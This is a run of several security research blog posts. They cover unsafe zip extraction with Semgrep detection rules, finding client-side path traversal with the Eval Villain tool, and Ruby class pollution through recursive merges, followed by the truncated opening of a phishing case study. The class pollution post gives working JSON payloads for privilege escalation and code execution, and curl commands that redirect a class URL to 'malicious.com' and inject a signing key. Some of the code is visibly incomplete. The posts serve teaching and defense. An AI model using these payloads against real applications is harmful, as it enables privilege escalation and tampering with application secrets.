Unsafe Archive Unpacking: Labs and Semgrep Rules


During my recent internship with Doyensec, I had the opportunity to research decompression attacks across different programming languages. As the use of archive file formats is widespread in software development, it is crucial for developers to understand the potential security risks involved in handling these files.

The objective of my research was to identify, analyze, and detect vulnerable implementations in several popular programming languages used for web and app development, including Python, Ruby, Swift, Java, PHP, and JavaScript. These languages have libraries for archive decompression that, when used improperly, may potentially lead to vulnerabilities.

To demonstrate the risk of unsafe unpacking, I created proof-of-concept (PoC) code with different vulnerable implementations for each method and each language. My work also focused on safe alternatives for each one of the vulnerable implementations. Additionally, I created a web application to upload and test whether the code used in a specific implementation is safe or not.

To efficiently search for vulnerabilities on larger codebases, I used a popular SAST (Static Application Security Testing) tool - Semgrep. Specifically, I wrote a set of rules to automatically detect those vulnerable implementations which it will make it easier to identify vulnerabilities.

Secure and insecure code, labs and Semgrep rules for all programming languages have been published on https://github.com/doyensec/Unsafe-Unpacking.

Understanding Archive Path Traversal

Extracting an archive (e.g., a ZIP file) usually involves reading all its contents and writing them to the specified extraction path. An archive path traversal aims to extract files to directories that are outside the intended extraction path.

This can occur when archive extraction is improperly handled, as archives may contain files with filenames referencing parent directories (e.g., using ../). If not properly checked, these sequences may cause the extraction to occur outside the intended directory.

For example, consider a ZIP file with the following structure:


When unzipping the archive to /home/output, if the extraction method does not validate or sanitize the file paths, the contents may be written to the following locations:


As a result, imbad.txt would be written outside the intended directory. If the vulnerable program runs with high privileges, this could also allow the attacker to overwrite sensitive files, such as /etc/passwd – where Unix-based systems store user account information.

Proving the Concept: Code Examples

To demonstrate the vulnerability, I created several proof-of-concept examples in various programming languages. These code snippets showcase vulnerable implementations where the archive extraction is improperly handled.


The combination of the ZipFile library as reader and shutil.copyfileobj() as writer makes the programmer responsible for handling the extraction correctly.

The usage of shutil.copyfileobj() is straightforward: as the first argument, we pass the file descriptor of the file whose contents we want to extract, and as the second argument, we pass the file descriptor to the destination file. Since the method receives file descriptors instead of paths, it doesn’t know if the path is out of the output directory, making the following implementation vulnerable.

def unzip(file_name, output):
    # bad
    with zipfile.ZipFile(file_name, 'r') as zf:
        for filename in zf.namelist():
            # Output
            output_path = os.path.join(output, filename)
            with zf.open(filename) as source:
                with open(output_path, 'wb') as destination:
                    shutil.copyfileobj(source, destination)
unzip1(./payloads/payload.zip", "./test_case")

If we run the previous code, we’ll realize that instead of extracting the zip content (poc.txt) to the test_case folder, it will be extracted to the parent folder:

$ python3 zipfile_shutil.py

$ ls test_case
# No output, empty folder

$ ls
payloads  poc.txt  test_case  zipfile_shutil.py


Zip::File.open(file_name).extract(entry, file_path)

The extract() method in Ruby’s zip library is used to extract an entry from the archive to the file_path directory. This method is unsafe since it doesn’t remove redundant dots and path separators. It’s the caller’s responsibility to make sure that file_path is safe:

require 'zip'
def unzip1(file_name, file_path)
  # bad
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      extraction_path = File.join(file_path, entry.name)
      zip_file.extract(entry, extraction_path) 

unzip1('./payloads/payload.zip', './test_case/')
$ ruby zip_unsafe.rb

$ ls test_case
# No output, empty folder

$ ls
payloads  poc.txt  test_case  zip_unsafe.rb

PHP, Swift, JS and Java

All the other cases are documented in Doyensec’s repository, along with the Semgrep rules and the labs.

Unsafe Unpacking Labs

As part of the research, I developed a few web applications that allow users to test whether specific archive extraction implementations are vulnerable to decompression attacks.

Class Pollution Gadgets

  • RUN: without uploading an archive, the application will extract one of the prebuilt malicious archives. If the user uploads an archive, that archive will be unpacked instead.

  • Clear TXT Files: the application will remove all the extracted files from the previous archives.

  • Fetch Directory Contents: the web application will show you both the archive directory (where files are supposed to be extracted) and the current directory (where files are NOT supposed to be extracted).

Class Pollution Gadgets

These web application labs are available for every language except Swift, for which a desktop application is provided instead.

Developing Semgrep Rules for Vulnerability Detection

One of the most efficient ways to detect vulnerabilities in open-source projects is by using static application analysis tools. Semgrep is a fast, open-source, static analysis tool that searches code, finds bugs, and enforces secure guardrails and coding standards.

Semgrep works by scanning source code for specific syntax patterns. Since it supports various programming languages and makes it simple to write custom rules, it was ideal for my research purposes.

In the following example I’m using the Unsafe-Unpacking/Python/PoC/src folder from the GitHub repository, which contains 5 unzipping vulnerabilities. You can run the Semgrep rule by using the following command:

semgrep scan --config=../../rules/zip_shutil_python.yaml


│ 5 Code Findings │

   ❯❯❱ rules.unsafe_unpacking
          Unsafe Zip Unpacking

           13┆ shutil.copyfileobj(source, destination)
           21┆ shutil.copyfileobj(source, destination)
           31┆ shutil.copyfileobj(source, destination)
           41┆ shutil.copyfileobj(source, destination)
           57┆ shutil.copyfileobj(source_file, target_file)

A set of 15 rules can be found in the GitHub repository.


Since in most of the vulnerable implementations the programmer is responsible for sanitizing or validating the output path, they can take two approaches to mitigate the problem.

1. Path Sanitization

To sanitize the path, the filename should be normalized. In the case of Ruby, the method Path.basename can be used, which removes redundant dots and converts a path like ../../../../bad.txt to bad.txt.

In the following code, when using File.join to compute the output path, File.basename is called to sanitize the entry filename from the archive, mitigating the vulnerability:

def safe_unzip(file_name, output)
  # good
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      # sanitize the entry path
      file_path = File.join(output, File.basename(entry.name))
      zip_file.extract(entry, file_path) 

The side effect of this mitigation is that the archive’s folder structure is flattened, and all files are extracted to a single folder. Due to this, the solution may not be ideal for many applications.

Another solution would be using Pathname.new().cleanpath, pathname (a built-in Ruby class). It can normalize paths and remove any ../ sequences:

require 'pathname'

def safe_unzip(file_name, output)
  output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)

  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      # Remove any relative path components like "../"
      sanitized_name = Pathname.new(entry.name).cleanpath.to_s
      sanitized_path = File.join(output, sanitized_name)

      zip_file.extract(entry, sanitized_path)

However, if the developer wants to sanitize the path themselves by removing ../ using any kind of replacement, they should make sure that the sanitization is applied repeatedly until there are no ../ sequences left. Otherwise, cases like the following can occur, leading to a bypass:

entry = "..././bad.txt"
sanitized_name = entry.gsub(/(\.\.\/)/, '') # ../bad.txt

2. Path Validation

Before writing the contents of the entry to the destination path, you should ensure that the write path is within the intended destination directory. This can be done by using start_with? to check if the write path starts with the destination path, which prevents directory traversal attacks.

def safe_unzip(file_name, output)
  output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)
  # good
  Zip::File.open(file_name) do |zip_file|
    zip_file.each do |entry|
      safe_path = File.expand_path(entry.name, output)

      unless safe_path.start_with?(File.expand_path(output))
        raise "Attempted Path Traversal Detected: #{entry.name}"

      zip_file.extract(entry, safe_path) 

It’s important to note that File.expand_path should be used instead of File.join. Using File.expand_path() is crucial because it converts a relative file path into an absolute file path, ensuring proper validation and preventing path traversal attacks.

For example, consider the following secure approach using File.expand_path:

# output = Ruby/PoC/test_case

# path = Ruby/PoC/secret.txt
path = File.expand_path(entry_var, output)

# Check for path traversal
unless path.start_with?(File.expand_path(output))
    raise "Attempted Path Traversal Detected: #{entry_var}"

In this case File.expand_path converts path to an absolute path, and the check with start_with correctly verifies whether the extracted file path is within the intended output directory.

On the other hand, if you use File.join to build the output path, it may result in vulnerabilities:

# output = Ruby/PoC/test_case

# path = Ruby/PoC/test_case/../secret.txt
path = File.join(output, entry_var)

# Incorrect check
unless path.start_with?(File.expand_path(output))
    raise "Attempted Path Traversal Detected: #{entry_var}"

The check would incorrectly return true even though the path actually leads outside the intended directory (test_case/../secret.txt), allowing an attacker to bypass the validation and perform a path traversal. The takeaway is to always normalize the path before verifying.

One detail I missed, which my mentor (Savio Sisco) pointed out, is that in the original safe_method, I didn’t include the following line:

output += File::SEPARATOR unless output.end_with?(File::SEPARATOR)

Without this line, it was still possible to bypass the start_with check. Although path traversal is not possible in this case, it could still lead to writing outside of the intended directory:

output = "/home/user/output"
entry.name = "../output_bypass/bad.txt"
safe_path = File.expand_path(entry.name, output) # /home/user/output_bypass/bad.txt
safe_path.start_with?(File.expand_path(output))# true


This research delves into the issue of unsafe archive extraction across various programming languages. The post shows how giving developers more freedom also places the responsibility on them. While manual implementations are important, they can also introduce serious security risks.

Additionally, as security researchers, it is important to understand the root cause of the vulnerability. By developing Semgrep rules and labs, we hope it will help others to identify, test and mitigate these vulnerabilities. All these resources are available in the Doyensec repository.

Decompression attacks are a broad field of research. While this blog covers some cases related to file extraction, there are still many other attacks, such as zip bombs and symlink attacks, that need to be considered.

A Few Thoughts On My Internship

Although this blog post is not about the internship, I would like to use this opportunity to discuss my experience too.

Two years ago, during my OSWE preparation, I came across a Doyensec blog post, and I used them as study resource . Months later, I found out they here hiring for an internship which I thought was an incredible opportunity.

The first time I applied, I received my very first technical challenge — a set of vulnerable code that was a lot of fun to work with if you enjoy reading code. However, I wasn’t able to pass the challenge that year. This year, after two interview rounds with Luca and John, I was finally accepted. The interviews were 360 degree, covering various aspects like how to fix a vulnerability, how computers work, how to make a secure snippet vulnerable, and how to approach threat modeling.

In my first few weeks, I was assigned to some projects with a lot of guidance from other security engineers. I had the chance to talk to them about their work at Doyensec and even chat with one former intern about his internship experience. I learned a lot about the company’s methodology, not only in terms of bug hunting but also in how to be more organized — both in work and in life. Just like many CTF players, I was used to working late into the night, but since I wasn’t working alone on these projects, this habit started to interfere with communication. Initially, it felt strange to open Burp when the sun was still up, but over time, I got used to it. I didn’t realize how much this simple change could improve my productivity until I fully adjusted.

Working on projects with large codebases or complex audits really pushed me to keep searching for bugs, even when it seemed like a dead end. There were times when I got really nervous after days without finding anything of interest. However, Savio was a great help during these moments, advising me to stay calm and stick to a clear methodology instead of letting my nerves drive me hunt without thinking. Eventually, I was able to find some cool bugs on those projects.

Even though I had very high expectations, this experience definitely lived up to them. A huge thanks to the team, especially Luca and Savio, who took great care of me throughout the entire process.

CSPT the Eval Villain Way!

Doyensec’s Maxence Schmitt recently built a playground to go with his CSPT research. In this blog post, we will demonstrate how to find and exploit CSPT bugs with Eval Villain. For this purpose, we will leverage the second challenge of Maxence’s playground.

A step-by-step intro to CSPT with Eval Villain

The next image shows what this methodology yields.

Eval Villain shows CSPT inital and secondary CSPT sinks

We’ve added some boxes and arrows in orange to better illustrate the current situation. First, Eval Villain saw that part of the page’s path is being used in a fetch request. There, you can plainly see the asdf%2f.. was being URL decoded. Or if you prefer, you can expanded the “Encoder function” group to check. Either way, Eval Villain had discovered the CSPT sink.

The second square is on top of a debug statement from evSourcer. This was where the response from the first fetch was being added to Eval Villain’s source bank. As a result, Eval Villain warned us that the _id parameter from the CSPT response had hit another fetch sink. Again, you could get a bit more details from the “Encoder function”.

From the arg[2/2] of each fetch we learned more. The first fetch is a GET that had "redirect":"follow" and the second had "method":"POST". So we controlled the path of a client-side GET request and an open redirect could have sent that request to our own server. The response of our own server would have then been used in the path of an authenticated POST request. This one image shows the entire exploit chain for a CSPT2CSRF exploit.

All of this instrumentation stays around to help us with our exploit. Clicking the provided solution we see the following image. This shows exactly how the exploit works.

Eval Villain shows an intended CSPT2CSRF solution

Building the picture yourself

Step 0: Tools

You will need Firefox with Eval Villain installed.

You’ll also need the CSPT playground, which runs in Docker via docker compose up. This should bring up a vulnerable web app on Read the README.md for more info.

We really do recommend trying this out in the playground. CSPT is one of those bugs that seems easy when you read about it in a blog but feels daunting when you run into it on a test.

Step 1: Finding a CSPT

Log into the playground and visit the “CSPT2CSRF : GET to POST Sink” page. Open the console with ctrl+shift+i on Linux or cmd+option+i on Mac. Ensure Eval Villain is turned on. With the default configuration of Eval Villain, you should just see [EV] Functions hooked for in the console.

In a real test though, we would see that there is obviously a parameter in the URL path. Eval Villain does not use the path as a source by default, due to false positives. So lets turn on “Path search” in the “Enable/Disable” pop-up menu (click the Eval Villain logo).

Now, after a page refresh, Eval Villain will tells us about two calls to fetch, each using the path. We don’t know if they are CSPT yet, we need to check if ../ is accepted, but it looks hopeful.

Eval Villain a finding potential CSPT via Path Search

Note: You may only see one fetch here, that is ok.

Step 2 Testing For CSPT

To test for actual CSPT, just add the string %2fasdf%2f.. to the end of the path. This is a good tip, since this will normalize to the original path, the website will act the same if it’s vulnerable. When you refresh the page you will see this in the console.

Eval Villain verifying a CSPT primitive

It’s that easy to find a CSPT primitive. Had the source been in window.name or a URL parameter, Eval Villain would likely have found it right away.

Since the URL path was encoded, Eval Villain gives us an encoder function. You can paste that into your console and use it to try new payloads quickly. The function will automatically apply URL encoding.

With a CSPT primitive, the next step toward exploitation is learning how the response of this request is used. For that, we want to ingest the response as a new source for Eval Villain.

Step 3 Enable evSourcer

First you need to enable the evSourcer global in Eval Villain. Go to the configuration page from the pop-up menu and scroll to the globals table. Enable the row that says “evSourcer”. Don’t forget to click save.

Enabling evSourcer in Configuration page

Now you can refresh the page and just run evSourcer.toString() in the console to verify the configuration change took.


You can run a quick test to try out the feature. Anything that goes into the second parameter of this function will be put into the Eval Villain source bank. Before using evSinker the string foobar does not generate a warning from the eval sink, afterward it does.

evSourcer example

Step 4: Getting the response of the CSPT request into evSourcer

So, if we put the response of the CSPT request into evSourcer, Eval Villain can tell us if it hits eval, .innerHTML, fetch or any other sink we have hooked.

To find the response to the CSPT request, we just look at the stack trace Eval Villain gave us.

Stack trace from CSPT sink

Here we have highlighted what we think of as the “magic zone”. When you see function names go from minified garbage, to big readable strings, that is where you typically want to start. That often means a transition from library code to developer written code, either forward or back. One of those two functions are probably what we want. Based on context, fetchNoteById is probably returning the info to Ko. So go to the Ko function in the debugger by clicking the link next to it. Once you get there, beautify the code by clicking the {} icon in the lower left of the code pane.

You will see some code like this:

      return (0, t.useEffect) (
          () => {
            r &&
            ot.fetchNoteById(r).then((e => { // <-- fetchNoteById call here
              ot.seenNote(e._id),         // <-- so `e` is probably our JSON response
            })).catch((e => {

fetchNoteById apparently returns a promise. This makes sense, so we would normally set a breakpoint in order to inspect e and compare it with the response from fetch. Once you validate it, it’s time to instrument.

Right-click on the line number that contains ot.seenNote and click “Add Conditional breakpoint”. Add in the evSinker call, using a name you can recognize as injecting the e variable. The evSinker function always returns false so we will never actually hit this breakpoint.

Adding response with evSourcer using a conditional breakpoint

Notice we have disabled source maps. Source maps can optimize out variables and make debugging harder. Also, Firefox sometimes takes a minute to work through beautifying code and putting breakpoints at the right spot, so just be patient.

Step 5: Refresh the page, check the secondary sink

Now we just refresh the page. Since we used true as the last parameter to evSinker, we will use console debugging to tell us what got injected. Enable “Debug” in the console. We can also enable XHR in the console to see requests and responses there. The requests we are interested in will directly follow Eval Villain output to the console, so they are easy to find. This is what we see.

Eval Villain found potential CSPT sink

For the sake of room, we closed the first fetch group. It does show the asdf%2f.. payload hitting fetch. The “XHR” entry we have open there does not show the directory traversal because it was normalized out. Eval Villain makes it easy to find though. The response from the “XHR” can be seen injected in the console debug below it. Then of course Eval Villain is able to spot it hitting the fetch sink.

Step 6: Extra little things

You may notice that there is no arg[2/2] output in the last picture. That argument is a JavaScript object. Eval Villain by default is configured to only look at strings. Open the pop-up menu, click types and enable objects. Then when you refresh the page you can see from the Eval Villain output what options are being passed to fetch.

Step 7: Exploit

The playground makes finding gadgets easy. Just go to the “gadgets” drop down in the page. The real world does not have that, so Burp Suite’s Bambda search seems to be the best bet. See Maxence’s CSPT research for more on that.

BONUS Feature! Eval Villain in Chrome, Electron and maybe Web Views?

Eval Villain is really just a JavaScript function, with config, that Firefox copy/pastes into each page before it loads. Once injected, it just uses the console to log output. So in theory, you could copy paste this same code manually into anywhere JavaScript is accepted.

Eval Villain 1.11 lets you do just that. Go to the configuration page and scroll to the very bottom. You will see a “Copy Injection” button. If you click it, the entire Eval Villain injection, along with the current configuration, will be put into your clipboard.

Using this we have gotten Eval Villain into an instrumented Electron App. The following screen shot shows Eval Villain running from a conditional breakpoint in Burp’s built-in Chrome browser.

Eval Villain found potential CSPT sink

Or you can use the HTTP Mock extension in Burp to paste Eval Villain into a web response. We have not tried it yet, but it will be cool to inject it into a Web View on Android using Frida.


Instrumenting the target code does not really take that long. This blog post explained step by step on how to leverage Eval Villain in order to find and exploit CSPT vulnerabilities. Even for learning new tricks using a playground, Eval Villain helps us debug little mistakes.

Make sure to use the right tool for the right job. For example, Eval Villain can’t decode everything (check out the fragment challenge). Maxence developed a great Burp Extension for CSPT, but it lacks insight into the DOM. Some other tools are Geko, DOMLogger++ and DOM Invader (enable xhr.open and fetch in sinks). Mix and match what works best for you.

Class Pollution in Ruby: A Deep Dive into Exploiting Recursive Merges


In this post, we are going to explore a rarely discussed class of vulnerabilities in Ruby, known as class pollution. This concept is inspired by the idea of prototype pollution in JavaScript, where recursive merges are exploited to poison the prototype of objects, leading to unexpected behaviors. This idea was initially discussed in a blog post about prototype pollution in Python, in which the researcher used recursive merging to poison class variables and eventually global variables via the __globals__ attribute.

In Ruby, we can categorize class pollution into three main cases:

  1. Merge on Hashes: In this scenario, class pollution isn’t possible because the merge operation is confined to the hash itself.

  2. Merge on Attributes (Non-Recursive): Here, we can poison the instance variables of an object, potentially replacing methods by injecting return values. This pollution is limited to the object itself and does not affect the class.

current_obj.instance_variable_set("@#{key}", new_object)
current_obj.singleton_class.attr_accessor key
  1. Merge on Attributes (Recursive): In this case, the recursive nature of the merge allows us to escape the object context and poison attributes or methods of parent classes or even unrelated classes, leading to a broader impact on the application.

Merge on Attributes

Let’s start by examining a code example where we exploit a recursive merge to modify object methods and alter the application’s behavior. This type of pollution is limited to the object itself.

require 'json'

# Base class for both Admin and Regular users
class Person

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)

  # Authorize based on the `to_s` method result
  def authorize
    if to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
      puts "Access denied: #{@name} is not an admin."

  # Health check that executes all protected methods using `instance_eval`
  def health_check
    protected_methods().each do |method|


  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|

      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key


  def check_cpu
    puts "CPU check passed."

  def check_memory
    puts "Memory check passed."

# Admin class inherits from Person
class Admin < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)

  def to_s

# Regular user class inherits from Person
class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)

  def to_s

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"

    # Perform a recursive merge, which could override methods

    # Authorize the user (privilege escalation vulnerability)
    # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'

    # Execute health check (RCE vulnerability)
    # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'


if ARGV.length != 1
  puts "Usage: ruby class_pollution.rb 'JSON_STRING'"

json_input = ARGV[0]

In the provided code, we perform a recursive merge on the attributes of the User object. This allows us to inject or override values, potentially altering the object’s behavior without directly modifying the class definition.

How It Works:

  1. Initialization and Setup:
    • The User object is initialized with specific attributes: name, age, and details. These attributes are stored as instance variables within the object.
  2. Merge:
    • The merge_with method is called with a JSON input that represents the additional data to be merged into the User object.
  3. Altering Object Behavior:
    • By passing carefully crafted JSON data, we can modify or inject new instance variables that affect how the User object behaves.
    • For example, in the authorize method, the to_s method determines whether the user is granted admin privileges. By injecting a new to_s method with a return value of "Admin", we can escalate the user’s privileges.
    • Similarly, in the health_check method, we can inject arbitrary code execution by overriding methods that are called via instance_eval.

Example Exploits:

  • Privilege Escalation: ruby class_pollution.rb {"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}
    • This injects a new to_s method that returns "Admin", granting the user unauthorized admin privileges.
  • Remote Code Execution: ruby class_pollution.rb {"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}
    • This injects a new method into the protected_methods list, which is then executed by instance_eval, allowing arbitrary code execution.

Class Pollution Gadgets


  • The aforementioned changes are limited to the specific object instance and do not affect other instances of the same class. This means that while the object’s behavior is altered, other objects of the same class remain unaffected.

This example highlights how seemingly innocuous operations like recursive merges can be leveraged to introduce severe vulnerabilities if not properly managed. By understanding these risks, developers can better protect their applications from such exploits.

Real-World Cases

Next, we’ll explore two of the most popular libraries for performing merges in Ruby and see how they might be vulnerable to class pollution. It’s important to note that there are other libraries potentially affected by this class of issues and the overall impact of these vulnerabilities varies.

1. ActiveSupport’s deep_merge

ActiveSupport, a built-in component of Ruby on Rails, provides a deep_merge method for hashes. By itself, this method isn’t exploitable given it is limited to hashes. However, if used in conjunction with something like the following, it could become vulnerable:

# Method to merge additional data into the object using ActiveSupport deep_merge
def merge_with(other_object)
merged_hash = to_h.deep_merge(other_object)

merged_hash.each do |key, value|
  self.class.attr_accessor key
  instance_variable_set("@#{key}", value)


In this example, if the deep_merge is used as shown, we can exploit it similarly to the first example, leading to potentially dangerous changes in the application’s behavior.

Active Support Class Pollution

2. Hashie

The Hashie library is widely used for creating flexible data structures in Ruby, offering features such as deep_merge. However, unlike the previous example with ActiveSupport, Hashie’s deep_merge method operates directly on object attributes rather than plain hashes. This makes it more susceptible to attribute poisoning.

Hashie has a built-in mechanism that prevents the direct replacement of methods with attributes during a merge. Normally, if you try to override a method with an attribute via deep_merge, Hashie will block the attempt and issue a warning. However, there are specific exceptions to this rule: attributes that end with _, !, or ? can still be merged into the object, even if they conflict with existing methods.

Key Points

  1. Method Protection: Hashie protects method names from being directly overridden by attributes ending in _, !, or ?. This means that, for example, trying to replace a to_s method with a to_s_ attribute will not raise an error, but the method will not be replaced either. The value of to_s_ will not override the method behavior, ensuring that existing method functionality remains intact. This protection mechanism is crucial to maintaining the integrity of methods in Hashie objects.

  2. Special Handling of _: The key vulnerability lies in the handling of _ as an attribute on its own. In Hashie, when you access _, it returns a new Mash object (essentially a temporary object) of the class you are interacting with. This behavior allows attackers to access and work with this new Mash object as if it were a real attribute. While methods cannot be replaced, this feature of accessing the _ attribute can still be exploited to inject or modify values.

    For example, by injecting "_": "Admin" into the Mash, an attacker could trick the application into accessing the temporary Mash object created by _, and this object can contain maliciously injected attributes that bypass protections.

A Practical Example

Consider the following code:

require 'json'
require 'hashie'

# Base class for both Admin and Regular users
class Person < Hashie::Mash

  # Method to merge additional data into the object using hashie
  def merge_with(other_object)

  # Authorize based on to_s
  def authorize
    if _.to_s == "Admin"
      puts "Access granted: #{@name} is an admin."
      puts "Access denied: #{@name} is not an admin."


# Admin class inherits from Person
class Admin < Person
  def to_s

# Regular user class inherits from Person
class User < Person
  def to_s

class JSONMergerApp
  def self.run(json_input)
    additional_object = JSON.parse(json_input)

    # Instantiate a regular user
    user = User.new({
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"

    # Perform a deep merge, which could override methods

    # Authorize the user (privilege escalation vulnerability)
    # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
    # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'

if ARGV.length != 1
  puts "Usage: ruby hashie.rb 'JSON_STRING'"

json_input = ARGV[0]

In the provided code, we are exploiting Hashie’s handling of _ to manipulate the behavior of the authorization process. When _.to_s is called, instead of returning the method-defined value, it accesses a newly created Mash object, where we can inject the value "Admin". This allows an attacker to bypass method-based authorization checks by injecting data into the temporary Mash object.

For example, the JSON payload {"_": "Admin"} injects the string “Admin” into the temporary Mash object created by _, allowing the user to be granted admin access through the authorize method even though the to_s method itself hasn’t been directly overridden.

This vulnerability highlights how certain features of the Hashie library can be leveraged to bypass application logic, even with protections in place to prevent method overrides.

Hashie Support Class Pollution

Escaping the Object to Poison the Class

When the merge operation is recursive and targets attributes, it’s possible to escape the object context and poison attributes or methods of the class, its parent class, or even other unrelated classes. This kind of pollution affects the entire application context and can lead to severe vulnerabilities.

require 'json'
require 'sinatra/base'
require 'net/http'

# Base class for both Admin and Regular users
class Person
  @@url = "http://default-url.com"

  attr_accessor :name, :age, :details

  def initialize(name:, age:, details:)
    @name = name
    @age = age
    @details = details

  def self.url

  # Method to merge additional data into the object
  def merge_with(additional)
    recursive_merge(self, additional)


  # Recursive merge to modify instance variables
  def recursive_merge(original, additional, current_obj = original)
    additional.each do |key, value|
      if value.is_a?(Hash)
        if current_obj.respond_to?(key)
          next_obj = current_obj.public_send(key)
          recursive_merge(original, value, next_obj)
          new_object = Object.new
          current_obj.instance_variable_set("@#{key}", new_object)
          current_obj.singleton_class.attr_accessor key
        current_obj.instance_variable_set("@#{key}", value)
        current_obj.singleton_class.attr_accessor key

class User < Person
  def initialize(name:, age:, details:)
    super(name: name, age: age, details: details)

# A class created to simulate signing with a key, to be infected with the third gadget
class KeySigner
  @@signing_key = "default-signing-key"

  def self.signing_key

  def sign(signing_key, data)

class JSONMergerApp < Sinatra::Base
  # POST /merge - Infects class variables using JSON input
  post '/merge' do
    content_type :json
    json_input = JSON.parse(request.body.read)

    user = User.new(
      name: "John Doe",
      age: 30,
      details: {
        "occupation" => "Engineer",
        "location" => {
          "city" => "Madrid",
          "country" => "Spain"


    { status: 'merged' }.to_json

  # GET /launch-curl-command - Activates the first gadget
  get '/launch-curl-command' do
    content_type :json

    # This gadget makes an HTTP request to the URL stored in the User class
    if Person.respond_to?(:url)
      url = Person.url
      response = Net::HTTP.get_response(URI(url))
      { status: 'HTTP request made', url: url, response_body: response.body }.to_json
      { status: 'Failed to access URL variable' }.to_json

  # Curl command to infect User class URL:
  # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge

  # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
  get '/sign_with_subclass_key' do
    content_type :json

    # This gadget signs data using the signing key stored in KeySigner class
    signer = KeySigner.new
    signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")

    { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json

  # Curl command to infect KeySigner signing key (run in a loop until successful):
  # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done

  # GET /check-infected-vars - Check if all variables have been infected
  get '/check-infected-vars' do
    content_type :json

      user_url: Person.url,
      signing_key: KeySigner.signing_key

  run! if app_file == $0

In the following example, we demonstrate two distinct types of class pollution:

  1. (A) Poisoning the Parent Class: By recursively merging attributes, we can modify variables in the parent class. This modification impacts all instances of that class and can lead to unintended behavior across the application.

  2. (B) Poisoning Other Classes: By brute-forcing subclass selection, we can eventually target and poison specific classes. This approach involves repeatedly attempting to poison random subclasses until the desired one is infected. While effective, this method can cause issues due to the randomness and potential for over-infection.

Detailed Explanation of Both Exploits

(A) Poisoning the Parent Class

In this exploit, we use a recursive merge operation to modify the @@url variable in the Person class, which is the parent class of User. By injecting a malicious URL into this variable, we can manipulate subsequent HTTP requests made by the application.

For example, using the following curl command:

curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge

We successfully poison the @@url variable in the Person class. When the /launch-curl-command endpoint is accessed, it now sends a request to http://malicious.com instead of the original URL.

This demonstrates how recursive merges can escape the object level and modify class-level variables, affecting the entire application.

Class Pollution Curl Gadget

(B) Poisoning Other Classes

This exploit leverages brute-force to infect specific subclasses. By repeatedly attempting to inject malicious data into random subclasses, we can eventually target and poison the KeySigner class, which is responsible for signing data.

For example, using the following looped curl command:

for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done

We attempt to poison the @@signing_key variable in KeySigner. After several attempts, the KeySigner class is infected, and the signing key is replaced with our injected key.

This exploit highlights the dangers of recursive merges combined with brute-force subclass selection. While effective, this method can cause issues due to its aggressive nature, potentially leading to the over-infection of classes.

Class Pollution Sign Gadget

In the latter examples, we set up an HTTP server to demonstrate how the infected classes remain poisoned across multiple HTTP requests. The persistent nature of these infections shows that once a class is poisoned, the entire application context is compromised, and all future operations involving that class will behave unpredictably.

The server setup also allowed us to easily check the state of these infected variables via specific endpoints. For example, the /check-infected-vars endpoint outputs the current values of the @@url and @@signing_key variables, confirming whether the infection was successful.

This approach clearly shows how class pollution in Ruby can have lasting and far-reaching consequences, making it a critical area to secure.


The research conducted here highlights the risks associated with class pollution in Ruby, especially when recursive merges are involved. These vulnerabilities are particularly dangerous because they allow attackers to escape the confines of an object and manipulate the broader application context. By understanding these mechanisms and carefully considering how data merges are handled, it is possible to mitigate the risk of class pollution in Ruby applications.

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Applying Security Engineering to Make Phishing Harder - A Case Study


Recently Doyensec was hired by a client offering a “Communication Platform as a Service”. This platform allows their clients to craft a customer service experience and to communicate with their own customers via a plethora of channels: email, web chats, social media and more.

While undoubtedly valuable, such a service introduces a unique threat model. Our client’s users work with a vast amount of incoming correspondence from outside (often anonymous) users, on a daily basis. This makes them particularly vulnerable to phishing and other social engineering attacks.

